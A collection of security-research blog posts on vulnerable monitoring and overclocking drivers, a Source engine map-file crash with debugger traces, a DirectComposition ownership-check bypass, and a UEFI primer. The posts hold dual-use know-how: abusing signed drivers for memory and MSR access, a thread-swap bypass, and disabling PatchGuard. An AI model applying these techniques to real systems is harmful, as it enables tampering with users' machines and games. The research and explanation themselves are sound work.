Why anti-cheats block overclocking tools

By: Daax
28 April 2020 at 23:00

Overview

This is a brief informational piece for readers who don’t come from a deep technical background in cheats, anti-cheats, drivers, or related topics. It’s come to our attention that many people are wondering why certain anti-cheats block or log when a player has overclocking/tuning software open. I’ll start off by explaining why these types of software require drivers, then show a few examples of why they’re dangerous and explain how the recycling of dangerous code leaves the end-user vulnerable. Recycling code out of convenience, at the risk of your end-users, is a lazy decision that can result in damage to their systems. In this case, the code is recycled from sites like kernelmode.info, OSR Online, and so on. The drivers used by this software are particularly problematic and would be the first targets I’d look for if I were looking to exploit a large population of people; gamers and tech enthusiasts would be a good crowd because of the tools presented below. This is by no means an exhaustive list. I’m only addressing a few drivers that are or have been exploited in cheating communities, and there are dozens if not hundreds more in the wild. Let’s cover why this kind of software needs a driver in the first place.

Notice: We are not affiliated with game publishers or anti-cheat vendors, paid or otherwise.

Driver Requirements

Hardware monitoring/overclocking tools have risen in popularity over the last half-decade with the growth of professional gaming and the technical requirements of certain games. These tools query various system components like the GPU, CPU, thermal sensors, and so on. However, this information isn’t easily acquired by a user. For example, to query the on-die digital temperature sensor for CPU temperature data, an application needs to read a model-specific register. These registers, and the instructions that read and write them, are only available when operating at a higher privilege level such as ring-0 (where drivers operate).

A model-specific register (MSR) is a control register defined by the x86 architecture. As the name suggests, some registers are present on certain processors while others are not, making them model-specific. They’re primarily used for storing platform-specific information and CPU feature information; they can also be used for performance monitoring or thermal sensor monitoring. Intel provided two instructions in the x86 ISA, rdmsr and wrmsr, that allow privileged software (operating system or otherwise) to query or modify the state of one of these registers. The extensive list of MSRs available on Intel and AMD processors can be found in their respective SDM/APM. The significance of this is that much of the state in these MSRs should not be modified by any task, privileged or not. There is rarely a need to do so, even when writing device drivers.
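To make the temperature example concrete, here is a minimal sketch of what a monitoring tool might do with the raw values once a driver has executed rdmsr on its behalf. It assumes the Intel layout, where IA32_THERM_STATUS (0x19C) reports a digital readout in degrees below a reference and MSR_TEMPERATURE_TARGET (0x1A2) holds that reference (TjMax). The sample values and the function name are hypothetical, and no real MSR is read here.

```python
IA32_THERM_STATUS = 0x19C       # per-core thermal status MSR (Intel)
MSR_TEMPERATURE_TARGET = 0x1A2  # holds the TjMax reference on many Intel CPUs


def decode_core_temp(therm_status, temperature_target):
    """Return the core temperature in degrees C, or None if the reading is invalid."""
    reading_valid = (therm_status >> 31) & 0x1     # bit 31: reading valid
    if not reading_valid:
        return None
    digital_readout = (therm_status >> 16) & 0x7F  # bits 22:16: degrees below TjMax
    tj_max = (temperature_target >> 16) & 0xFF     # bits 23:16: TjMax in degrees C
    return tj_max - digital_readout


# Hypothetical raw values, as a driver might hand them back after rdmsr.
sample_status = (1 << 31) | (40 << 16)  # valid reading, 40 degrees below TjMax
sample_target = 100 << 16               # TjMax of 100 degrees C

print(decode_core_temp(sample_status, sample_target))  # 60
```

Note that this only ever needs a read of two specific registers, which is the narrow capability a monitoring driver could expose instead of arbitrary MSR access.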

Many drivers for hardware monitoring software allow an unprivileged task (in terms of privilege level, excluding Admin requirements) to read/write arbitrary MSRs. How does that work? Well, there must be a mode of communication through which an unprivileged application can read privileged data, and these drivers provide that interface. It’s important to reiterate that the majority of hardware monitoring/overclocking drivers packaged with a client application expose much more functionality than necessary through this communication protocol. The client application, let’s say the CPUZ desktop application, uses a Windows API function named DeviceIoControl. In the simplest sense, CPUZ calls DeviceIoControl with an I/O control code (IOCTL), known to the developers, that tells the driver to perform a read of an MSR such as the one for the on-die digital temperature sensor. This isn’t an inherently dangerous thing. What’s problematic is that these drivers implement additional functionality that is outside the scope of the software and expose it through this same interface, such as writing to MSRs or physical memory.
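For readers who have never seen one, an I/O control code is just a 32-bit number packed from four fields, following the layout of the CTL_CODE macro in the Windows headers. The sketch below builds and decodes one. The device type 0x9C40 and function 0x800 are made-up values for illustration, not codes taken from the CPUZ driver.

```python
from typing import NamedTuple

# Transfer methods, indexed by the low two bits of the code.
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")


class IoctlFields(NamedTuple):
    device_type: int
    access: int
    function: int
    method: str


def ctl_code(device_type, function, method, access):
    """Pack the four fields the same way the CTL_CODE macro does."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a 32-bit control code back into its fields."""
    return IoctlFields(
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=METHODS[code & 0x3],
    )


# Hypothetical vendor-defined code: device type 0x9C40, function 0x800.
code = ctl_code(0x9C40, 0x800, 0, 0)
print(hex(code))  # 0x9c402000
print(decode_ioctl(code))
```

Because the layout is fixed and public, the constants compared in a driver's dispatch routine are easy to recognize as control codes once the driver is in a disassembler.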

So, if only the developers know the codes, then why is it an issue? Reverse engineering is a fruitful endeavor. All an attacker has to do is get a copy of the driver, load it into their disassembler of choice, like IDA Pro, and look for the IOCTL handler. One IOCTL code in the CPUZ driver, for example, is used to send 2 bytes out to 2 different I/O ports: 0xB2 (broadcast SMI) and 0x84 (output port 4). This is interesting because you can force an SMI using port 0xB2, which allows entry to System Management Mode. However, this doesn’t really accomplish anything significant; it’s just interesting to note. The SMI port is primarily used for debugging.

Now, let’s take a look at a driver, shipped from Intel, that allows every operation an attacker could dream of.

Undisclosed Intel driver

This driver was packaged with a diagnostic tool created by Intel. It allows for many different operations, the most problematic of which is the ability for an unprivileged application to write directly to a page in physical memory.

Note: Unprivileged application meaning an application running at a low privilege level (ring-3), despite the requirement of Admin rights to carry out the DeviceIoControl request.

Among other things, it allows direct port I/O (which is supposed to be a privileged operation), and this can be abused to cause all sorts of issues on a target machine. A malicious actor could use it to perform a denial-of-service by writing to an I/O port that hard resets the processor.

As a diagnostic tool from Intel, the operations make some sense. However, this is a signed driver associated with a public tool and in the wrong hands could be abused to wreak havoc, in this case, on a game. The ability to read and write physical memory means that an attacker can access a game’s memory without having to do traditional things like open a handle to the process and use Windows APIs to assist in reading the virtual memory. It’s a bit of work for the attacker, but that’s never stopped any motivated individual. Well, I don’t use this diagnostic tool - so who cares? Take a look at the next two tools that use vulnerable drivers.

HWMonitor

I’ve seen it mentioned around different communities for overclocking, general diagnostics, and by people who don’t have enough fans in their case to keep their hardware from overheating. This tool carries a driver whose functionality is also quite problematic. The screenshot below shows a different method of reading a portion of physical memory, via MmMapIoSpace. This would be useful for an attacker to use against a game under the guise of a trusted hardware monitoring tool. What about writing to those model-specific registers? This tool has no business writing to any MSRs, yet it exposes a control case where the right code allows a user to write to any model-specific register. Here are two images of different IOCTL blocks in HWMonitor.

As a bonus, the driver that HWMonitor uses is also the driver that CPUZ uses! If an anti-cheat were to simply block HWMonitor, the application, from running, the attacker could simply pull up CPUZ and have the same capabilities. This is an issue because, as mentioned earlier, model-specific registers are meant to be read and written only by system software. Exposing these registers to the user through any sort of unchecked interface gives an attacker the ability to modify system data they should otherwise not have access to. It allows attackers to circumvent protections that may be put in place by a third party such as an anti-cheat. An anti-cheat can register callbacks such as ExCbSeImageVerificationDriverInfo, which lets its driver get information about a driver being loaded. Utilizing a trusted driver lets attackers go undetected: many personally signed drivers are logged/flagged/dumped by some anti-cheats, while certain ones that are WHQL-signed or from a vendor like Intel are inherently trusted. This callback is also one method anti-cheats use to prevent drivers, like the packaged driver for CPUZ, from loading, or to simply note that they are present even if the name of the driver has been modified.

MSI Afterburner

At this point, it’s probably clear why many of these drivers are blocked from loading by anti-cheat software. I’ll let this exploit-db page speak for MSI Afterburner. It’s just as bad as the aforementioned drivers and to preserve the integrity of the system and game it’s reasonable for anti-cheats to prevent it from loading.

These vulnerabilities have since been patched; this is merely an example of the type of behavior found in many tools. While MSI responded appropriately and updated Afterburner, not all OC/monitoring tools have been updated.

Conclusion

It should make sense now, however unfortunate it is, why some anti-cheats prevent the loading of these types of drivers. I’ve seen various arguments against this tactic, but in the end, the anti-cheat’s job is to protect the integrity of the game and maximize the quality of gameplay. If that means you can’t run your hardware monitoring tool, then you’re just going to have to shut it off to play. Cheaters in games have been using these drivers since late 2015/2016, and maybe even before that (however, the first PoC wasn’t public on a large cheating forum before then). Blocking them is necessary to ensure that the anti-cheat is not being tampered with through a trusted third-party driver and that the game is protected from hackers using this method of attack. It’s understandable that being unable to use monitoring tools is frustrating, but rather than blame the anti-cheat, blame the vendors of these types of software, who are recycling dangerous code and putting your system at risk regardless of the game you play. If I were an attacker, I would definitely consider using one of these many drivers to compromise a system.

A solution for some of the companies would be to simply remove the unnecessary code, like mapping physical memory, writing to model-specific registers, writing to control registers, and so on. Retaining only read access to thermal sensors and other component-related data would be much less of an issue.

This is by no means an extensive article, just a brief information piece to help players/users understand why their hardware monitoring/overclocking tools are blocked by an anti-cheat.

Source Engine Memory Corruption via LUMP_PAKFILE

By: impost0r
5 May 2020 at 23:00

A month or so ago I dropped a Source engine zero-day on Twitter without much explanation of what it does. After determining that it’s unfortunately not exploitable, we’ll be exploring it, and the mess that is Valve’s Source Engine.

History

Valve’s Source Engine was initially released in June 2004, with the first game utilizing the engine being Counter-Strike: Source, which was itself released on November 1, 2004 - 15 or so years ago. Despite being touted as a “complete rewrite”, Source still inherits code from GoldSrc and its parent, the Quake Engine. Alongside the possibility of grandfathering in bugs from GoldSrc and Quake (GoldSrc itself a victim of this), Valve’s security model for the engine is… non-existent. Valve was not yet the powerhouse they are today, but we’re left with numerous stupid fucking mistakes, dude, including designing your own memory allocator (or rather, making a wrapper around malloc).

Of note - it’s relatively common for games to develop their own allocator, but from a security perspective it’s still not the greatest.

The Bug

The byte at offset 0xA47B98 in the .bsp file I released, together with the following three bytes (\x90\x90\x90\x90 in total), is parsed as a UInt32 and controls how much memory is allocated as the .bsp is being loaded, namely in CS:GO (though CS:S, TF2, and L4D2 are also affected). That’s the short of it.

To understand more, we’re going to have to delve deeper. Recently the source code for CS:GO circa 2017’s Operation Hydra was released - this will be our main tool.

Let’s start with WinDBG. With csgo.exe loaded with the arguments -safe -novid -nosound +map exploit.bsp, we hit our first-chance exception at “Host_NewGame”.

---- Host_NewGame ----
(311c.4ab0): Break instruction exception - code 80000003 (first chance)
*** WARNING: Unable to verify checksum for C:\Users\triaz\Desktop\game\bin\tier0.dll
eax=00000001 ebx=00000000 ecx=7b324750 edx=00000000 esi=90909090 edi=7b324750
eip=7b2dd35c esp=012fcd68 ebp=012fce6c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c:
7b2dd35c cc              int     3

In the $esi register we can see the four responsible bytes, and if we peek at the stack:

Full stack trace removed for succinctness.

              
00 012fce6c 7b2dac51 90909090 90909090 012fd0c0 tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c [cstrike15_src\tier0\memstd.cpp @ 2880] 
01 (Inline) -------- -------- -------- -------- tier0!CStdMemAlloc::InternalAlloc+0x12c [cstrike15_src\tier0\memstd.cpp @ 2043] 
02 012fce84 77643546 00000000 00000000 00000000 tier0!CStdMemAlloc::Alloc+0x131 [cstrike15_src\tier0\memstd.cpp @ 2237] 
03 (Inline) -------- -------- -------- -------- filesystem_stdio!IMemAlloc::IndirectAlloc+0x8 [cstrike15_src\public\tier0\memalloc.h @ 135] 
04 (Inline) -------- -------- -------- -------- filesystem_stdio!MemAlloc_Alloc+0xd [cstrike15_src\public\tier0\memalloc.h @ 258] 
05 (Inline) -------- -------- -------- -------- filesystem_stdio!CUtlMemory<unsigned char,int>::Init+0x44 [cstrike15_src\public\tier1\utlmemory.h @ 502] 
06 012fce98 7762c6ee 00000000 90909090 00000000 filesystem_stdio!CUtlBuffer::CUtlBuffer+0x66 [cstrike15_src\tier1\utlbuffer.cpp @ 201]

Or, in a more succinct form -

0:000> dds esp
012fcd68  90909090

The bytes in $esi are sitting right at the top of the stack (duh). A wonderful start. Keep that module, filesystem_stdio, in mind, as it’ll be important later. If we continue debugging:

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

And there we see it: the memory allocator has tried to allocate 0x90909090 bytes, read as a UInt32. While I simply used HxD to validate this, the following Python one-liner does the same conversion.

print(int('0x90909090', 0))

(The parenthesized form runs on both Python 2.7 and Python 3.)

This returns 2425393296, the value Source’s spaghetti code tried to allocate. (Python’s int is arbitrary-precision, so the hex string comes back as a positive number; ctypes.c_uint32(0x90909090).value gives the same result if you want to mirror the C type explicitly.)
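As a small illustration of why the type matters, the same four bytes can be read either as an unsigned or as a signed 32-bit little-endian integer. This is only a sketch using Python's struct module; it makes no claim about which interpretation each layer of the engine uses internally, beyond the allocator message quoted above.

```python
import struct

raw = b"\x90\x90\x90\x90"  # the four bytes taken from the map file

(as_unsigned,) = struct.unpack("<I", raw)  # little-endian unsigned 32-bit
(as_signed,) = struct.unpack("<i", raw)    # little-endian signed 32-bit

print(as_unsigned)  # 2425393296
print(as_signed)    # -1869574000
```

The unsigned reading matches the size in the OUT OF MEMORY message, while the signed reading is what a plain 32-bit int parameter would hold for the same bit pattern.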

So let’s delve a bit deeper, shall we? We would normally use macOS for the next part, love it or hate it, since everyone who writes cross-platform code for it (and Darwin in general) seems to forget that stripping binaries is a thing. We don’t have symbols for NT, so macOS would be a viable substitute. But hey, we have the damn source code, so we can do this on Windows.

Minimization

One important thing to do before we go fully into exploitation is to minimize the bug. The bug is a derivative of one found with a wrapper around zzuf, which was re-found with CERT’s BFF tool. If we look at the differences between the original map (cs_assault) and ours, we can see that they are numerous.

Diff between files

Minimization was done manually in this case, using BSPInfo and extracting and comparing the lumps. As expected, the key error was in lump 40 - LUMP_PAKFILE. This lump is essentially a large .zip file. We can use 010 Editor’s ZIP file template to examine it.
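If 010 Editor isn't at hand, the same record can be inspected with a few lines of Python. The sketch below builds a tiny ZIP in memory (the file name and contents are hypothetical stand-ins for a real pak lump), locates the end-of-central-directory record, and reads the central directory size field. It then overwrites that field with 0x90909090 to mimic the kind of corruption involved, on the assumption, based on the walkthrough further down, that this size field is the attacker-controlled value.

```python
import io
import struct
import zipfile

EOCD_SIGNATURE = b"PK\x05\x06"
# signature, disk number, disk with central dir, entries on disk,
# total entries, central dir size, central dir offset, comment length
EOCD_FORMAT = "<4sHHHHIIH"  # 22 bytes, little-endian


def read_eocd(data):
    """Return (record position, total entries, central dir size, central dir offset)."""
    pos = data.rfind(EOCD_SIGNATURE)
    if pos < 0:
        raise ValueError("no end-of-central-directory record found")
    fields = struct.unpack_from(EOCD_FORMAT, data, pos)
    total_entries, cd_size, cd_offset = fields[4], fields[5], fields[6]
    return pos, total_entries, cd_size, cd_offset


# Build a small stand-in archive entirely in memory.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("materials/example.vmt", "hypothetical file contents")
data = buf.getvalue()

pos, total_entries, cd_size, cd_offset = read_eocd(data)
print(total_entries, cd_size, cd_offset)

# Overwrite the 4-byte size field (12 bytes into the record).
corrupted = bytearray(data)
struct.pack_into("<I", corrupted, pos + 12, 0x90909090)
print(read_eocd(bytes(corrupted))[2])  # 2425393296
```

In a well-formed archive without a trailing comment, the central directory ends exactly where this record begins, which gives a parser an easy consistency check.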

Symbols and Source (Code)

The behavior between the Steam release and the leaked source will differ significantly.

No bug will function in a completely identical way across platforms. Assuming your goal is to weaponize this, or even get the maximum payout from Valve on H1, your main target should be Win32 - though other platforms are a viable substitute. Linux has some great tooling available and Valve regularly forgets strip is a thing on macOS (so do many other developers).

We can look at the stack trace provided by WinDBG to ascertain what’s going on.

WinDBG Stack Trace

Starting from frame 8, we’ll walk through what’s happening.

The first line of each snippet will denote where WinDBG decides the problem is.

		if ( pf->Prepare( packfile->filelen, packfile->fileofs ) )
		{
			int nIndex;
			if ( addType == PATH_ADD_TO_TAIL )
			{
				nIndex = m_SearchPaths.AddToTail();	
			}
			else
			{
				nIndex = m_SearchPaths.AddToHead();	
			}

			CSearchPath *sp = &m_SearchPaths[ nIndex ];

			sp->SetPackFile( pf );
			sp->m_storeId = g_iNextSearchPathID++;
			sp->SetPath( g_PathIDTable.AddString( newPath ) );
			sp->m_pPathIDInfo = FindOrAddPathIDInfo( g_PathIDTable.AddString( pPathID ), -1 );

			if ( IsDvdDevPathString( newPath ) )
			{
				sp->m_bIsDvdDevPath = true;
			}

			pf->SetPath( sp->GetPath() );
			pf->m_lPackFileTime = GetFileTime( newPath );

			Trace_FClose( pf->m_hPackFileHandleFS );
			pf->m_hPackFileHandleFS = NULL;

			//pf->m_PackFileID = m_FileTracker2.NotePackFileOpened( pPath, pPathID, packfile->filelen );
			m_ZipFiles.AddToTail( pf );
		}
		else
		{
			delete pf;
		}
	}
}

It’s worth noting that you’re reading this correctly - LUMP_PAKFILE is simply an embedded ZIP file. There’s nothing too much of consequence here - just pointing out m_ZipFiles does indeed refer to the familiar archival format.

Frame 7 is where we start to see what’s going on.

	zipDirBuff.EnsureCapacity( rec.centralDirectorySize );
	zipDirBuff.ActivateByteSwapping( IsX360() || IsPS3() );
	ReadFromPack( -1, zipDirBuff.Base(), -1, rec.centralDirectorySize, rec.startOfCentralDirOffset );
	zipDirBuff.SeekPut( CUtlBuffer::SEEK_HEAD, rec.centralDirectorySize );

If you open LUMP_PAKFILE in 010 Editor and parse it as a ZIP file, you’ll see the following.

010 Editor viewing LUMP_PAKFILE as Zipfile

elDirectorySize is our rec.centralDirectorySize, in this case. Skipping forward a frame, we can see the following.

Commented out lines highlight lines of interest.

CUtlBuffer::CUtlBuffer( int growSize, int initSize, int nFlags ) : 
	m_Error(0)
{
	MEM_ALLOC_CREDIT();
	m_Memory.Init( growSize, initSize );
	m_Get = 0;
	m_Put = 0;
	m_nTab = 0;
	m_nOffset = 0;
	m_Flags = nFlags;
	if ( (initSize != 0) && !IsReadOnly() )
	{
		m_nMaxPut = -1;
		AddNullTermination( m_Put );
	}
	else
	{
		m_nMaxPut = 0;
	}
	...

followed by the next frame,

template< class T, class I >
void CUtlMemory<T,I>::Init( int nGrowSize /*= 0*/, int nInitSize /*= 0*/ )
{
	Purge();

	m_nGrowSize = nGrowSize;
	m_nAllocationCount = nInitSize;
	ValidateGrowSize();
	Assert( nGrowSize >= 0 );
	if (m_nAllocationCount)
	{
		UTLMEMORY_TRACK_ALLOC();
		MEM_ALLOC_CREDIT_CLASS();
		m_pMemory = (T*)malloc( m_nAllocationCount * sizeof(T) );
	}
}

and finally,

inline void *MemAlloc_Alloc( size_t nSize )
{ 
	return g_pMemAlloc->IndirectAlloc( nSize );
}

where nSize is the value we control, or $esi. Keep in mind, this is all before the actual segfault and $eip corruption. Skipping ahead to that –

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

We’re brought to the same familiar fault. Of note is that $eax and $eip are the same value, and consistent throughout runs. If we look at the stack trace WinDBG provides, we see much of the same.

WinDBG Stack Trace

Picking apart the locals from CZipPackFile::Prepare, we can see the values on $eip and $eax repeated a few times. Namely, the tuple m_PutOverflowFunc.

m_PutOverflowFunc

So we’re able to corrupt this variable and, as such, control $eax and $eip, but unfortunately not to any useful extent. These values seem more or less arbitrary, depending on game version and map data. What we have, essentially, is a malloc whose size argument nSize (0x90909090) is fully under our control. However, the caller doesn’t check whether malloc returned a valid pointer, so the game just segfaults after attempting to allocate roughly 2.4 GB of memory (and getting a null pointer back). In the end, we have a novel denial of service that does result in “control” of the instruction pointer, though not to an extent that we can pop a shell, calc, or do anything fun with it.

Thanks to mev for phrasing this better than I could.
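For contrast, here is a minimal sketch of the kind of sanity check that would reject the malformed lump before any allocation happens. It is not Valve's code or fix, and the function and parameter names are hypothetical. It only shows the idea that a central directory cannot be larger than the pack file that contains it.

```python
def central_directory_is_sane(cd_size, cd_offset, pack_length):
    """True when the central directory lies entirely inside the pack file."""
    if cd_size < 0 or cd_offset < 0:
        return False
    # Python integers do not overflow; a C++ version would need to guard this sum.
    return cd_offset + cd_size <= pack_length


print(central_directory_is_sane(78, 1024, 1124))          # True
print(central_directory_is_sane(0x90909090, 1024, 1124))  # False
```

A check like this, combined with testing the pointer returned by the allocator, would turn the crash into a cleanly rejected map.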

I’d like to thank mev, another one of our members, for assisting with this writeup, alongside paracord and vmcall.

Abusing DComposition to render on external windows

By: yousif
12 May 2020 at 23:00

In 2012, Microsoft introduced “DirectComposition”, a technology that tremendously improves performance for bitmap drawing & composition. It works by using the graphics hardware to compose & render objects, which means that it runs independently of the main UI thread.

It can therefore be deduced that there must be a layer of interaction, or a method to apply the composition onto the desired window or target. Abusing this layer of interaction is the main focus of today’s article.

The layer of interaction that DirectComposition uses consists of objects called “targets” & “visuals”. Every IDCompositionTarget is created by a respective API function that depends on a window handle, and every target depends on an IDCompositionVisual, which contains the visual content represented on the screen.

If you think that you can easily just create a window, then compose on-top of another window from a non-owning process, then you’re wrong. This will cause an error, and the composition won’t be created.

Reversal

Opening up win32kfull, the kernel-mode component for DWM, GDI & other Windows features, and searching for “DComposition” yields multiple results:

The one we’re interested in is NtUserCreateDCompositionHwndTarget. According to its prototype, __int64 (HWND a1, int a2, _QWORD *a3), we can infer that this simply corresponds to IDCompositionDevice::CreateTargetForHwnd, and that the parameters are (HWND hwnd, BOOL topmost, IDCompositionTarget** target).

At the very start of this function there’s a test that checks whether you can create a target for this composition or not:

last_status = TestWindowForCompositionTarget(window_handle, top_most);

This is a simplified form of that function:

NTSTATUS TestWindowForCompositionTarget(HWND window_handle, BOOL top_most)
{	
	tagWND* window_instance = ValidateHwnd(window_handle);
	
	if (!window_instance 
		|| !window_instance->thread_info)
		return STATUS_INVALID_PARAMETER;
		
	// some checks here to verify that DCompositions are supported, and available
	
	PEPROCESS calling_process = IoGetCurrentProcess();
	PEPROCESS owning_process = PsGetThreadProcess(window_instance->thread_info->owning_thread); // tagWnd*->tagTHREADINFO*->KTHREAD*
	
	if (calling_process != owning_process)
		return STATUS_ACCESS_DENIED;
	
	CHwndTargetProp target_properties{};
	
	if (CWindowProp::GetProp<CHwndTargetProp>(window_instance, &target_properties))
	{
		bool unk_error = false;
		
		if (top_most)
			unk_error = !(target_properties.top_most_handle == nullptr);
		else
			unk_error = !(target_properties.active_bg_handle == nullptr);
		
		if (unk_error)
			return (NTSTATUS)0x803e0006; // unique error code, i don't know what it's supposed to resemble
	}
	
	return STATUS_SUCCESS;
}

The check causing failures is if (calling_process != owning_process). It compares the caller’s process to the window’s owner process, and if the two differ, the function returns STATUS_ACCESS_DENIED.

They retrieve the window’s owner process by calling ValidateHwnd, which is a function used everywhere in win32k:

This function will return a pointer to a struct of type tagWND, then access a member of type tagTHREADINFO at +0x10 (window_instance->thread_info), then access the actual thread pointer at +0x0 (thread_info->owning_thread).

One way to circumvent these checks is to temporarily swap the owning thread of the target process’ window for the one that owns our window, compose our target on it, then swap it back very quickly, which is what the PoC is based on.

Proof Of Concept

I’ve made a PoC that’ll hijack a window by its class name, then render a rectangle at its center. You can access the code here.

Introduction to UEFI: Part 1

26 May 2020 at 23:00

Hello, and welcome to our first article on the site! Today we will be diving into UEFI. We are aiming to provide beginners a brief first look at a few topics, including:

  1. What is UEFI?
  2. Why develop UEFI software?
  3. UEFI boot phases
  4. Getting started with developing UEFI software

What is UEFI?

Unified Extensible Firmware Interface (UEFI) is an interface that acts as the “middle-man” between the operating system and the platform firmware during the start-up process of the system. It is the successor to the BIOS and provides us with a modern alternative to the restrictive system that preceded it. The UEFI specification allows for many new features including:

  • Graphical User Interface (GUI) with mouse support
  • Support for GPT drives (including 2TB or greater drives, and more than 4 primary partitions)
  • Faster booting (depending on OS support)
  • Simplified ACPI access for power management features
  • Simplified software development compared to the arcane BIOS

As you can see, there are many compelling reasons for using UEFI over the legacy BIOS nowadays.
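The 2TB figure in the list above falls out of simple arithmetic: the legacy MBR partition table stores sector addresses in 32 bits, while GPT uses 64-bit addresses. A quick worked calculation, assuming the traditional 512-byte logical sector size:

```python
SECTOR_SIZE = 512   # bytes; assumes the traditional logical sector size
MBR_LBA_BITS = 32   # MBR partition entries use 32-bit sector addresses
GPT_LBA_BITS = 64   # GPT uses 64-bit sector addresses

mbr_limit = (2 ** MBR_LBA_BITS) * SECTOR_SIZE
gpt_limit = (2 ** GPT_LBA_BITS) * SECTOR_SIZE

print(mbr_limit // 2**40, "TiB")  # 2 TiB
print(gpt_limit // 2**70, "ZiB")  # 8 ZiB
```

Drives with larger logical sectors shift both limits upward, but the gap between the two schemes stays the same.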

Why develop UEFI software?

There are many reasons as to why one would want to develop UEFI software, and today we will be mentioning a few of those reasons to hopefully inspire some of you to attempt to develop or further your knowledge in this subject.

1) Control over the boot process

One very big use case for UEFI is a boot manager such as GRUB. GRUB (GRand Unified Bootloader) is a multi-boot loader that allows a user to select the operating system they wish to boot into, whilst handling the process of selecting which OS or kernel needs to be loaded into memory. It will then transfer control to the respective OS. This is a very helpful tool, and makes use of UEFI to remove the need for manual interaction in the loading of alternative OSes.

2) Modification of OS kernel initialization

Sometimes one may want to redirect certain OS kernel initialization procedures or even fully prevent them from running. This is not possible to do with a boot-time driver. Why is this the case? Well, a large part of kernel initialization happens before any drivers are loaded, so any modifications will not be possible after this point in the presence of Kernel Patch Protection (PatchGuard). Another reason is the issue of Driver Signature Enforcement (DSE): Microsoft requires that loaded drivers on Windows must be signed with a valid kernel mode signing certificate, unless test signing mode is enabled.

An example of a UEFI project that modifies Windows kernel initialization procedures is EfiGuard. This UEFI driver patches certain parts of the Windows boot loader and kernel at boot time, and can effectively disable PatchGuard and optionally DSE.

3) Develop low level system knowledge

Another reason for developing UEFI software could be to increase your understanding of the system at a low level. Being able to follow the initialization process of the system allows for a much more in-depth look at how operating systems themselves work. Additionally, the ability to build OS independent drivers, as well as work with a sophisticated toolset giving you full control over a system is something that may be of interest to many people.

UEFI boot phases

UEFI has six main boot phases, which are all critical in the initialization process of the platform. The combined phases are referred to as the Platform Initialization or PI. Hopefully the brief descriptions of each stage below will give you a basic understanding of this process. Our series will focus primarily on the DXE and RT phases, as these are probably the two main areas of interest for people getting started with UEFI.

Security (SEC)

This phase is the first stage of the UEFI boot process, and is generally used to initialize a temporary memory store, act as the root of trust in the system, and provide information to the Pre-EFI Initialization (PEI) core. This root of trust is a mechanism that ensures any code that is executed in the PI is cryptographically validated (digitally signed), creating a “secure boot” environment.

Pre-EFI Initialization (PEI)

This is the second stage of the boot process and involves using only the CPU’s current resources to dispatch Pre-EFI Initialization Modules (PEIMs). These are used to perform initialization of specific boot-critical operations such as memory initialization, whilst also allowing control to pass to the Driver Execution Environment (DXE).

Driver Execution Environment (DXE)

The DXE phase is where the majority of the system initialization occurs. In the PEI stage, the memory required for the DXE to operate is allocated and initialized, and upon control being passed to the DXE, the DXE Dispatcher is then invoked. The dispatcher will perform the loading and execution of hardware drivers, runtime services, and any boot services required for the operating system to start.

Boot Device Selection (BDS)

Upon completion of the DXE Dispatcher executing all DXE drivers, control is passed to the BDS. This stage is responsible for initializing console devices and any remaining devices that are required. The selected boot entry is then loaded and executed in preparation for the Transient System Load (TSL).

Transient System Load (TSL)

In this phase, the PI process is now directly between the boot selection and the expected hand-off to the main operating system phase. Here, an application such as the UEFI shell may be invoked, or (more commonly) a boot loader will run in order to prepare the final OS environment. The boot loader is usually responsible for terminating the UEFI Boot Services via the ExitBootServices() call. However, it is also possible for the OS itself to do this, such as the Linux kernel with CONFIG_EFI_STUB.

Runtime (RT)

The final phase is the runtime one. Here is where the final handoff to the OS occurs. The UEFI compatible OS now takes over the system. The UEFI runtime services remain available for the OS to use, such as for querying and writing variables from NVRAM.

The SMM (System Management Mode) exists separately from the runtime phase and may also be entered during this phase when an SMI is dispatched. We will not be covering the SMM in this introduction.

Getting started with developing UEFI software

In this section we will be providing you with a list of the most essential tools to help you begin your development journey with UEFI. When it comes to the question of “where to begin?”, there aren’t many resources easily accessible, so here is a shortlist of the development tools we recommend:

- EDK2

First and foremost is the EDK2 project, which is described as “a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications from www.uefi.org.” The EDK2 project is developed and maintained (together with community volunteers) by many of the same parties that contribute to the UEFI specification.

This is extremely helpful as EDK2 is guaranteed to contain the latest UEFI protocols (assuming you are using the master branch). In addition to this, there are countless high-quality projects for you to use as a guide. One example is the Open Virtual Machine Firmware (OVMF). This is a project that is aimed at providing UEFI support for virtual machines and it is very well documented.

One major downside to EDK2 is the process of setting up the build environment for the first time - it is a long and arduous process, and even with their Getting started with EDK2 guide to make it as simple as possible, it can still be confusing for newcomers.

- VisualUefi

The VisualUefi project is aimed at allowing EDK2 development inside Visual Studio. We recommend that you begin development with the EDK2 command-line build tools rather than this project, so that you become comfortable with the platform.

Furthermore, VisualUefi offers headers and libraries that are a subset of the complete EDK2 libraries, and so you may find that not everything you require is easily accessible. It is, however, much easier to set up in comparison to EDK2, and is therefore often favored by avid Visual Studio users.

- Debugging

In regards to debugging, there are a few options available to you, each with their pros and cons. These will be listed below, and it is up to you which you favor the most. In part 2 of this series we will be showing you how to debug an example driver, so until then you may want to install all of these (or none!) to help you make an informed decision:

